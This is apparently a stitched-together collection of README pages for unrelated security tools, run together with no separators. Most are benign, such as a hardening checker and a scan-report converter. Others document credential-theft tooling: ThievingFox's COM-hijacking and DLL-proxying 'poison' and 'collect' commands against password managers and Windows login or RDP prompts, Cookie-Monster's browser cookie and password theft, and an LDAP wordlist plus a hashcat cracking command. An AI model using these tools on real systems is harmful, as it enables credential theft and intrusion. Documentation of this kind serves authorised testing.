/\
_ / |
/ \ | \
| |\| |
| | | /
| /| |/
|/ |/
,/; ; ;
,'/|; ,/,/,
,'/ |;/,/,/,/|
,/; |;|/,/,/,/,/|
,/'; |;|,/,/,/,/,/|
,/'; |;|/,/,/,/,/,/|,
/ ; |;|,/,/,/,/,/,/|
/ ,'; |;|/,/,/,/,/,/,/|
/,/'; |;|,/,/,/,/,/,/,/|
/;/ '; |;|/,/,/,/,/,/,/,/|
โโโโโโโ โโโโโโโโ โโโโโโโ โโโโโโ โโโโโโโโโโโ โโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโ
โโโโโโโโโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโ
โโโโโโโ โโโโโโ โโโ โโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโ
โโโ โโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโโโโโโ โโโโโโโ โโโ โโโโโโโโโโโ โโโโโโโ โโโโโโโโ
P E N T E S T A R S E N A L
A comprehensive web application security testing toolkit that combines 10 powerful penetration testing features into one tool.
Identifies potential security Misconfigurations" title="Misconfigurations">misconfigurations
JWT Token Inspector
Detects common JWT vulnerabilities
Parameter Pollution Finder
Detects server-side parameter handling issues
CORS Misconfiguration Scanner
Detects credential exposure risks
Upload Bypass Tester
Identifies dangerous file type handling
Exposed .git Directory Finder
Tests for sensitive information disclosure
SSRF (Server Side Request Forgery) Detector
Includes cloud metadata endpoint tests
Blind SQL Injection Time Delay Detector
Identifies injectable parameters
Local File Inclusion (LFI) Mapper
Supports various encoding bypasses
Web Application Firewall (WAF) Fingerprinter
git clone https://github.com/sobri3195/pegasus-pentest-arsenal.git
cd pegasus-pentest-arsenal
python -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install -r requirements.txt
python pegasus_pentest.py
This project is licensed under the MIT License - see the LICENSE file for details.
This tool is provided for educational and authorized testing purposes only. Users are responsible for obtaining proper authorization before testing any target. The authors are not responsible for any misuse or damage caused by this tool.
Torward is an improved version based on the torghost-gn and darktor scripts, designed to enhance anonymity on the Internet. The tool prevents data leaks and forces all traffic from our computer to be routed exclusively through the Tor network, providing a high level of privacy in our connections.
git clone https://github.com/chundefined/Torward.git
cd Torward
chmod +x install.sh
./install.sh
This version includes several key security improvements to protect your identity and ensure better network configuration:
IPv6 Leak Prevention
IPv6 is now disabled to prevent any potential IP leaks. All traffic is forced through the Tor network by modifying system IPv6 settings in network_config.py
.
Enhanced iptables Rules
Strict iptables rules are implemented to ensure only Tor traffic is allowed. Non-Tor traffic is blocked, DNS queries are routed through Tor, and only essential connections to Tor ports are permitted. Additionally, IPv6 traffic is blocked to prevent leaks.
Tor Configuration Adjustments
The torward
file has been updated to enforce that all traffic, including DNS queries, is routed through Tor, improving anonymity.
Lazywarden is a Python automation tool designed to Backup and Restore data from your vault, including Bitwarden attachments. It allows you to upload backups to multiple cloud storage services and receive notifications across multiple platforms. It also offers AES encrypted backups and uses key derivation with Argon2, ensuring maximum security for your data.
The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking.
The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems.
The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts.
Similar to how pilots utilize flight simulators for training, we can use the Damn Vulnerable Drone simulator to gain in-depth knowledge of real-world drone systems, understand their vulnerabilities, and learn effective methods to exploit them.
The Damn Vulnerable Drone platform is open-source and available at no cost and was specifically designed to address the substantial expenses often linked with drone hardware, hacking tools, and maintenance. Its cost-free nature allows users to immerse themselves in drone hacking without financial concerns. This accessibility makes the Damn Vulnerable Drone a crucial resource for those in the fields of information security and penetration testing, promoting the development of offensive cybersecurity skills in a safe environment.
The Damn Vulnerable Drone platform operates on the principle of Software-in-the-Loop (SITL), a simulation technique that allows users to run drone software as if it were executing on an actual drone, thereby replicating authentic drone behaviors and responses.
ArduPilot's SITL allows for the execution of the drone's firmware within a virtual environment, mimicking the behavior of a real drone without the need for physical hardware. This simulation is further enhanced with Gazebo, a dynamic 3D robotics simulator, which provides a realistic environment and physics engine for the drone to interact with. Together, ArduPilot's SITL and Gazebo lay the foundation for a sophisticated and authentic drone simulation experience.
While the current Damn Vulnerable Drone setup doesn't mirror every drone architecture or configuration, the integrated tactics, techniques and scenarios are broadly applicable across various drone systems, models and communication protocols.
A tool to generate a wordlist from the information present in LDAP, in order to crack non-random passwords of domain accounts.
ย
The bigger the domain is, the better the wordlist will be.
name
and sAMAccountName
name
and sAMAccountName
name
name
name
and descriptions
descriptions
--outputfile
To generate a wordlist from the LDAP of the domain domain.local
you can use this command:
./LDAPWordlistHarvester.py -d 'domain.local' -u 'Administrator' -p 'P@ssw0rd123!' --dc-ip 192.168.1.101
You will get the following output if using the Python version:
You will get the following output if using the Powershell version:
Once you have this wordlist, you should crack your NTDS using hashcat, --loopback
and the rule clem9669_large.rule.
./hashcat --hash-type 1000 --potfile-path ./client.potfile ./client.ntds ./wordlist.txt --rules ./clem9669_large.rule --loopback
$ ./LDAPWordlistHarvester.py -h
LDAPWordlistHarvester.py v1.1 - by @podalirius_
usage: LDAPWordlistHarvester.py [-h] [-v] [-o OUTPUTFILE] --dc-ip ip address [-d DOMAIN] [-u USER] [--ldaps] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]
options:
-h, --help show this help message and exit
-v, --verbose Verbose mode. (default: False)
-o OUTPUTFILE, --outputfile OUTPUTFILE
Path to output file of wordlist.
Authentication & connection:
--dc-ip ip address IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter
-d DOMAIN, --domain DOMAIN
(FQDN) domain to authenticate to
-u USER, --user USER user to authenticate with
--ldaps Use LDAPS instead of LDAP
Credentials:
--no- pass Don't ask for password (useful for -k)
-p PASSWORD, --password PASSWORD
Password to authenticate with
-H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH
NT/LM hashes, format is LMhash:NThash
--aes-key hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-k, --kerberos Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
It can be difficult for security teams to continuously monitor all on-premises servers due to budget and resource constraints. Signature-based antivirus alone is insufficient as modern malware uses various obfuscation techniques. Server admins may lack visibility into security events across all servers historically. Determining compromised systems and safe backups to restore from during incidents is challenging without centralized monitoring and alerting. It is onerous for server admins to setup and maintain additional security tools for advanced threat detection. The rapid mean time to detect and remediate infections is critical but difficult to achieve without the right automated solution.
Determining which backup image is safe to restore from during incidents without comprehensive threat intelligence is another hard problem. Even if backups are available, without knowing when exactly a system got compromised, it is risky to blindly restore from backups. This increases the chance of restoring malware and losing even more valuable data and systems during incident response. There is a need for an automated solution that can pinpoint the timeline of infiltration and recommend safe backups for restoration.
The solution leverages AWS Elastic Disaster Recovery (AWS DRS), Amazon GuardDuty and AWS Security Hub to address the challenges of malware detection for on-premises servers.
This combo of services provides a cost-effective way to continuously monitor on-premises servers for malware without impacting performance. It also helps determine safe recovery point in time backups for restoration by identifying timeline of compromises through centralized threat analytics.
AWS Elastic Disaster Recovery (AWS DRS) minimizes downtime and data loss with fast, reliable recovery of on-premises and cloud-based applications using affordable storage, minimal compute, and point-in-time recovery.
Amazon GuardDuty is a threat detection service that continuously monitors your AWS accounts and workloads for malicious activity and delivers detailed security findings for visibility and remediation.
AWS Security Hub is a cloud security posture management (CSPM) service that performs security best practice checks, aggregates alerts, and enables automated remediation.
The Malware Scan solution assumes on-premises servers are already being replicated with AWS DRS, and Amazon GuardDuty & AWS Security Hub are enabled. The cdk stack in this repository will only deploy the boxes labelled as DRS Malware Scan in the architecture diagram.
Amazon Security Hub enabled. If not, please check this documentation
Warning
Currently, Amazon GuardDuty Malware scan does not support EBS volumes encrypted with EBS-managed keys. If you want to use this solution to scan your on-prem (or other-cloud) servers replicated with DRS, you need to setup DRS replication with your own encryption key in KMS. If you are currently using EBS-managed keys with your replicating servers, you can change encryption settings to use your own KMS key in the DRS console.
Create a Cloud9 environment with Ubuntu image (at least t3.small for better performance) in your AWS account. Open your Cloud9 environment and clone the code in this repository. Note: Amazon Linux 2 has node v16 which is not longer supported since 2023-09-11 git clone https://github.com/aws-samples/drs-malware-scan
cd drs-malware-scan
sh check_loggroup.sh
Deploy the CDK stack by running the following command in the Cloud9 terminal and confirm the deployment
npm install
cdk bootstrap
cdk deploy --all
Note
The solution is made of 2 stacks: * DrsMalwareScanStack: it deploys all resources needed for malware scanning feature. This stack is mandatory. If you want to deploy only this stack you can run cdk deploy DrsMalwareScanStack
* ScanReportStack: it deploys the resources needed for reporting (Amazon Lambda and Amazon S3). This stack is optional. If you want to deploy only this stack you can run cdk deploy ScanReportStack
If you want to deploy both stacks you can run cdk deploy --all
All lambda functions route logs to Amazon CloudWatch. You can verify the execution of each function by inspecting the proper CloudWatch log groups for each function, look for the /aws/lambda/DrsMalwareScanStack-*
pattern.
The duration of the malware scan operation will depend on the number of servers/volumes to scan (and their size). When Amazon GuardDuty finds malware, it generates a SecurityHub finding: the solution intercepts this event and runs the $StackName-SecurityHubAnnotations
lambda to augment the SecurityHub finding with a note containing the name(s) of the DRS source server(s) with malware.
The SQS FIFO queues can be monitored using the Messages available and Message in flight metrics from the AWS SQS console
The DRS Volume Annotations DynamoDB tables keeps track of the status of each Malware scan operation.
Amazon GuardDuty has documented reasons to skip scan operations. For further information please check Reasons for skipping resource during malware scan
In order to analize logs from Amazon GuardDuty Malware scan operations, you can check /aws/guardduty/malware-scan-events
Amazon Cloudwatch LogGroup. The default log retention period for this log group is 90 days, after which the log events are deleted automatically.
Run the following commands in your terminal:
cdk destroy --all
(Optional) Delete the CloudWatch log groups associated with Lambda Functions.
For the purpose of this analysis, we have assumed a fictitious scenario to take as an example. The following cost estimates are based on services located in the North Virginia (us-east-1) region.
Monthly Cost | Total Cost for 12 Months |
---|---|
171.22 USD | 2,054.74 USD |
Service Name | Description | Monthly Cost (USD) |
---|---|---|
AWS Elastic Disaster Recovery | 2 Source Servers / 1 Replication Server / 4 disks / 100GB / 30 days of EBS Snapshot Retention Period | 71.41 |
Amazon GuardDuty | 3 TB Malware Scanned/Month | 94.56 |
Amazon DynamoDB | 100MB 1 Read/Second 1 Writes/Second | 3.65 |
AWS Security Hub | 1 Account / 100 Security Checks / 1000 Finding Ingested | 0.10 |
AWS EventBridge | 1M custom events | 1.00 |
Amazon Cloudwatch | 1GB ingested/month | 0.50 |
AWS Lambda | 5 ARM Lambda Functions - 128MB / 10secs | 0.00 |
Amazon SQS | 2 SQS Fifo | 0.00 |
Total | 171.22 |
Note The figures presented here are estimates based on the assumptions described above, derived from the AWS Pricing Calculator. For further details please check this pricing calculator as a reference. You can adjust the services configuration in the referenced calculator to make your own estimation. This estimation does not include potential taxes or additional charges that might be applicable. It's crucial to remember that actual fees can vary based on usage and any additional services not covered in this analysis. For critical environments is advisable to include Business Support Plan (not considered in the estimation)
See CONTRIBUTING for more information.
HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. Hardening Meter supports all Linux distributions and machine-readable output, the results can be printed to the screen a table format or be exported to a csv. (For more information see Documentation.md file)
Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.
python3 HardeningMeter.py -f /bin/cp -s
Before installing HardeningMeter, make sure your machine has the following: 1. readelf
and file
commands 2. python version 3 3. pip 4. tabulate
pip install tabulate
The very latest developments can be obtained via git.
Clone or download the project files (no compilation nor installation is required)
git clone https://github.com/OfriOuzan/HardeningMeter
Specify the files you want to scan, the argument can get more than one file seperated by spaces.
Specify the directory you want to scan, the argument retrieves one directory and scan all ELF files recursively.
Specify whether you want to add external checks (False by default).
Prints according to the order, only those files that are missing security hardening mechanisms and need extra attention.
Specify if you want to scan the system hardening methods.
Specify if you want to save the results to csv file (results are printed as a table to stdout by default).
HardeningMeter's results are printed as a table and consisted of 3 different states: - (X) - This state indicates that the binary hardening mechanism is disabled. - (V) - This state indicates that the binary hardening mechanism is enabled. - (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.
When the default language on Linux is not English make sure to add "LC_ALL=C" before calling the script.
ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internals functions to gather crendentials.
The accompanying blog post can be found here
Rustup must be installed, follow the instructions available here : https://rustup.rs/
The mingw-w64 package must be installed. On Debian, this can be done using :
apt install mingw-w64
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu
Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin
After adding Mono repositories, Nuget can be installed using apt :
apt install nuget
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
.
Rustup must be installed, follow the instructions available here : https://rustup.rs/
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc
.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"
Finally, python dependancies must be installed :
pip install -r client/requirements.txt
ThievingFox works with python >= 3.11
NOTE : On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developper Powershell (Tools > Command Line > Developper Powershell)
All modules have been tested on the following Windows versions :
Windows Version |
---|
Windows Server 2022 |
Windows Server 2019 |
Windows Server 2016 |
Windows Server 2012R2 |
Windows 10 |
Windows 11 |
[!CAUTION] Modules have not been tested on other version, and are expected to not work.
Application | Injection Method |
---|---|
KeePass.exe | AppDomainManager Injection |
KeePassXC.exe | DLL Proxying |
LogonUI.exe (Windows Login Screen) | COM Hijacking |
consent.exe (Windows UAC Popup) | COM Hijacking |
mstsc.exe (Windows default RDP client) | COM Hijacking |
RDCMan.exe (Sysinternals' RDP client) | COM Hijacking |
MobaXTerm.exe (3rd party RDP client) | COM Hijacking |
[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the
cleanup
module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.
ThievingFox contains 3 main modules : poison
, cleanup
and collect
.
For each application specified in the command line parameters, the poison
module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that has matches the properties of the original DLL, uploads it to the server, and modify the registry if needed to perform COM hijacking.
To speed up the process of compilation of all libraries, a cache is maintained in client/cache/
.
--mstsc
, --rdcman
, and --mobaxterm
have a specific option, respectively --mstsc-poison-hkcr
, --rdcman-poison-hkcr
, and --mobaxterm-poison-hkcr
. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR
hive, meaning all users will be impacted. By default, only all currently logged in users are impacted (all users that have a HKCU
hive).
--keepass
and --keepassxc
have specific options, --keepass-path
, --keepass-share
, and --keepassxc-path
, --keepassxc-share
, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.
The KeePass modules requires the Visual C++ Redistributable
to be installed on the target.
Multiple applications can be specified at once, or, the --all
flag can be used to target all applications.
[!IMPORTANT] Remember to clean the cache if you ever change the
--tempdir
parameter, since the directory name is embedded inside native DLLs.
$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--ke epassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications
For each application specified in the command line parameters, the cleanup
first removes poisonning artifacts that force the target application to load the hooking library. Then, it tries to delete the library that were uploaded to the remote host.
For applications that support poisonning of both HKCU
and HKCR
hives, both are cleaned up regardless.
Multiple applications can be specified at once, or, the --all
flag can be used to cleanup all applications.
It does not clean extracted credentials on the remote host.
[!IMPORTANT] If the targeted application is in use while the
cleanup
module is ran, the DLL that are dropped on the target cannot be deleted. Nonetheless, thecleanup
module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted byThievingFox
are logged.
$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and cons ent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications
For each application specified on the command line parameters, the collect
module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir>
corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/
.
Multiple applications can be specified at once, or, the --all
flag can be used to collect logs from all applications.
$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of th e domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications
Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file
Install requirements
pip3 install -r requirements.txt
Base64 encode the webkit masterkey
python3 base64-encode.py "\xec\xfc...."
Decrypt Chrome/Edge Cookies File
python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Decrypt Chome/Edge Passwords File
python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd
Ensure Mingw-w64 and make is installed on the linux prior to compiling.
make
to compile exe on windows
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI
This tool takes a scanning tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:
This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all scanning reports.
Using Pip:
pip install --user sr2t
You can use sr2t
in two ways:
sr2t --help
.python -m src.sr2t --help
$ sr2t --help
usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]
[--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]
[--testssl TESTSSL [TESTSSL ...]]
[--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]
[--nmap-services] [--no-nessus-autoclassify]
[--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]
[--nessus-tls-file NESSUS_TLS_FILE]
[--nessus-x509-file NESSUS_X509_FILE]
[--nessus-http-file NESSUS_HTTP_FILE]
[--nessus-smb-file NESSUS_SMB_FILE]
[--nessus-rdp-file NESSUS_RDP_FILE]
[--nessus-ssh-file NESSUS_SSH_FILE]
[--nessus-min-severity NESSUS_MIN_SEVERITY]
[--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]
[--nessus-sort-by NESSUS_SORT_BY]
[--nikto-description-width NIKTO_DESCRIPTION_WIDTH]< br/> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]
[-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]
[-oA OUTPUT_ALL]
Converting scanning reports to a tabular format
optional arguments:
-h, --help show this help message and exit
--nmap-state NMAP_STATE
Specify the desired state to filter (e.g.
open|filtered).
--nmap-services Specify to ouput a supplemental list of detected
services.
--no-nessus-autoclassify
Specify to not autoclassify Nessus results.
--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE
Specify to override a custom Nessus autoclassify YAML
file.
--nessus-tls-file NESSUS_TLS_FILE
Specify to override a custom Nessus TLS findings YAML
file.
--nessus-x509-file NESSUS_X509_FILE
Specify to override a custom Nessus X.509 findings
YAML file.
--nessus-http-file NESSUS_HTTP_FILE
Specify to override a custom Nessus HTTP findings YAML
file.
--nessus-smb-file NESSUS_SMB_FILE
Specify to override a custom Nessus SMB findings YAML
file.
--nessus-rdp-file NESSUS_RDP_FILE
Specify to override a custom Nessus RDP findings YAML
file.
--nessus-ssh-file NESSUS_SSH_FILE
Specify to override a custom Nessus SSH findings YAML
file.
--nessus-min-severity NESSUS_MIN_SEVERITY
Specify the minimum severity to output (e.g. 1).
--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH
Specify the width of the pluginid column (e.g. 30).
--nessus-sort-by NESSUS_SORT_BY
Specify to sort output by ip-address, port, plugin-id,
plugin-name or severity.
--nikto-description-width NIKTO_DESCRIPTION_WIDTH
Specify the width of the description column (e.g. 30).
--fortify-details Specify to include the Fortify abstracts, explanations
and recommendations for each vulnerability.
--annotation-width ANNOTATION_WIDTH
Specify the width of the annotation column (e.g. 30).
-oC OUTPUT_CSV, --output-csv OUTPUT_CSV
Specify the output CSV basename (e.g. output).
-oT OUTPUT_TXT, --output-txt OUTPUT_TXT
Specify the output TXT file (e.g. output.txt).
-oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX
Specify the outpu t XLSX file (e.g. output.xlsx). Only
for Nessus at the moment
-oA OUTPUT_ALL, --output-all OUTPUT_ALL
Specify the output basename to output to all formats
(e.g. output).
specify at least one:
--nessus NESSUS [NESSUS ...]
Specify (multiple) Nessus XML files.
--nmap NMAP [NMAP ...]
Specify (multiple) Nmap XML files.
--nikto NIKTO [NIKTO ...]
Specify (multiple) Nikto XML files.
--dirble DIRBLE [DIRBLE ...]
Specify (multiple) Dirble XML files.
--testssl TESTSSL [TESTSSL ...]
Specify (multiple) Testssl JSON files.
--fortify FORTIFY [FORTIFY ...]
Specify (multiple) HP Fortify FPR files.
A few examples
To produce an XLSX format:
$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --nessus example/nessus.nessus
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| host | port | plugin id | plugin name | severity | annotations |
+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+
| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |
| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |
| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |
